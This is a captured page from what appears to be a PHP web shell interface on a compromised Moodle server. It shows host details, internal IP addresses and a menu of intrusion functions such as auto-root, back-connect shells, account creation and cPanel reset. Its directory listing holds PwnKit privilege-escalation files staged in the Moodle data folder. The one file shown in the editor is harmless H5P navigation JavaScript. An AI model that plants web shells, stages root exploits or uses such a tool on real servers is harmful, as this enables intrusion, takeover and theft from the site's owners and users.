Linux moodl-moodle-3s8bw1nuh5yqd9-5b875fdd66-8hs4m 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64
Apache/2.4.41 (Ubuntu)
: 10.39.0.36 | : 10.36.0.0
Cant Read [ /etc/named.conf ]
7.4.3
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
moodledata /
filedir /
de /
c9 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
dec9e27ff6cb7df4f1901ae783d303...
5.46
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dec9e27ff6cb7df4f1901ae783d3035b428e55df
var H5P = H5P || {}; H5P.DocumentationTool = H5P.DocumentationTool || {}; /** * Naivgation Menu module * @external {jQuery} $ H5P.jQuery */ H5P.DocumentationTool.NavigationMenu = (function ($, EventDispatcher) { /** * @private * @type {number} */ var numInstances = 0; /** * Initialize module. * @param {Object} params Behavior settings * @param {Number} id Content identification * @returns {Object} NavigationMenu NavigationMenu instance */ function NavigationMenu(docTool, navMenuLabel) { EventDispatcher.call(this); var self = this; this.$ = $(this); this.docTool = docTool; this.highlightIncompletePages = false; this.navMenuLabel = navMenuLabel; // Hide menu if body is clicked $('body').click(function () { self.$documentationToolContaner.removeClass('expanded'); }); numInstances++; } NavigationMenu.prototype = Object.create(EventDispatcher.prototype); NavigationMenu.prototype.constructor = NavigationMenu; /** * Attach function called by H5P framework to insert H5P content into page. * * @param {jQuery} $container The container which will be appended to. */ NavigationMenu.prototype.attach = function ($container) { var self = this; this.$documentationToolContaner = $container; var $navigationMenu = $('<div/>', { 'class': 'h5p-navigation-menu' }).prependTo($container); var menuHeaderId = 'h5p-navigation-menu-' + numInstances; var $navigationMenuHeader = $('<div>', { 'class': 'h5p-navigation-menu-header', 'id': menuHeaderId }).appendTo($navigationMenu); $('<span>', { 'html': self.navMenuLabel }).appendTo($navigationMenuHeader); var $navigationMenuEntries = $('<div>', { 'class': 'h5p-navigation-menu-entries', role: 'menu', 'aria-labelledby': menuHeaderId }).appendTo($navigationMenu); this.docTool.pageInstances.forEach(function (page, pageIndex) { var pageTitle = ''; // Try to get page title try { pageTitle = page.getTitle(); } catch (e) { throw new Error('Page does not have a getTitle() function - ' + e); } // Create page entry var $navigationMenuEntry = $('<div/>', { 'class': 'h5p-navigation-menu-entry', 'role': 'menuitem', 'tabindex': '0' }).appendTo($navigationMenuEntries); H5P.DocumentationTool.handleButtonClick($navigationMenuEntry, function (event) { self.$documentationToolContaner.removeClass('expanded'); self.docTool.movePage(pageIndex, event); var progressedEvent = self.docTool.createXAPIEventTemplate('progressed'); // Using the parent documentation tool to create xapi template progressedEvent.data.statement.object.definition.extensions['http://id.tincanapi.com/extension/ending-point'] = pageIndex; self.trigger(progressedEvent); }); $('<span>', { 'html': pageTitle }).appendTo($navigationMenuEntry); // Add current class to the first item if (pageIndex === 0) { $navigationMenuEntry.addClass('current'); } }); this.$navigationMenuHeader = $navigationMenuHeader; this.$navigationMenu = $navigationMenu; this.$navigationMenuEntries = $navigationMenuEntries; }; /** * Updates current navigation menu entry with proper style * @param {Number} currentPageIndex Current page index */ NavigationMenu.prototype.updateNavigationMenu = function (currentPageIndex) { const self = this; if (this.highlightIncompletePages === false) { if (self.docTool.pageInstances[currentPageIndex].libraryInfo.machineName === 'H5P.DocumentExportPage') { this.highlightIncompletePages = true; } } // Get Ids of pages that contain required fields that are not filled const incompletePageIds = this.docTool.getIncompletePages().map(function (page) { return self.docTool.pageInstances.indexOf(page); }); if (incompletePageIds.length === 0) { this.highlightIncompletePages = false; } this.$navigationMenuEntries.children().each(function (entryIndex) { // Mark currently activated menu entry if (currentPageIndex === entryIndex) { $(this).addClass('current'); } else { $(this).removeClass('current'); } // Highlight menu entries that contain required fields not filled if (self.highlightIncompletePages && incompletePageIds.indexOf(entryIndex) !== -1) { $(this).addClass('required-inputs-not-filled'); } else { $(this).removeClass('required-inputs-not-filled'); } }); }; /** * Toggle responsive layout on or off * @param {boolean} isEnabled True to enable responsive layout */ NavigationMenu.prototype.setResponsiveLayout = function (isEnabled) { var self = this; if (isEnabled) { // Bind click to expand navigation menu this.$navigationMenuHeader.unbind('click'); this.$navigationMenuHeader.click(function () { self.$documentationToolContaner.toggleClass('expanded'); return false; }); // Add responsive class this.$documentationToolContaner.addClass('responsive'); } else { // Remove click action and remove responsive classes this.$navigationMenuHeader.unbind('click'); this.$documentationToolContaner.removeClass('expanded'); this.$documentationToolContaner.removeClass('responsive'); } }; return NavigationMenu; }(H5P.jQuery, H5P.EventDispatcher));
Close